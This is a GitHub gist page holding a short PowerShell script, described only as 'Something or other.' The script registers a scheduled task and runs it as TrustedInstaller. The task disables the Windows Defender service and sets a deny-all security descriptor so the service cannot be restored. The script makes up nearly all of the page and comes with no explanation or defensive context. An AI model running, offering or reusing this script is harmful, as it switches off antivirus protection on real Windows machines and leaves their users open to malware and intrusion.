-
-
Save imjdl/2613a6f687fd43f0c4d07009ebc346cd to your computer and use it in GitHub Desktop.
Something or other.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
$svc = New-Object -ComObject 'Schedule.Service' | |
$svc.Connect() | |
$user = 'NT SERVICE\TrustedInstaller' | |
$folder = $svc.GetFolder('\') | |
$task = $folder.GetTask('TestTask') | |
$task.RunEx($null, 0, 0, $user) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment